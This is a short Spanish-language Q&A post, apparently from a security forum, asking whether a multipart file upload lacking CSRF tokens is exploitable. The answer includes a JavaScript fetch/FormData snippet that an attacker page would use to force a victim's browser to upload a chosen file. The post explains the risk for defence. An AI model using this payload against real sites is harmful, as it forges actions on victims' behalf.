¿Es posible realizar ataques CSRF en la funcionalidad de carga de archivos? Mi aplicación carga archivos mediante el envío de solicitudes POST multipart / form-data sin ningún token aleatorio. ¿Es posible preparar un formulario HTML que demuestre este ataque en la aplicación?
Sí, eres vulnerable. Cada punto final que modifica el estado de su servidor debe tener protección contra los ataques CSRF. No se excluyen las cargas de archivos.
Entonces, ¿cómo puede ser explotado? Si su sitio es example.com , el atacante aloja un JS como este en un sitio en el que engaña a la víctima para que visite:
myFormData = new FormData();
myFormData.append("file", fileContent, "filename.txt");
fetch("http://example.com/fileupload.php", {
method: "post",
body: myFormData
});
Esto hará que el navegador de las víctimas envíe una solicitud POST a su sitio, con lo que el atacante elija como fileContent como archivo.
Lea otras preguntas en las etiquetas web-application csrf file-upload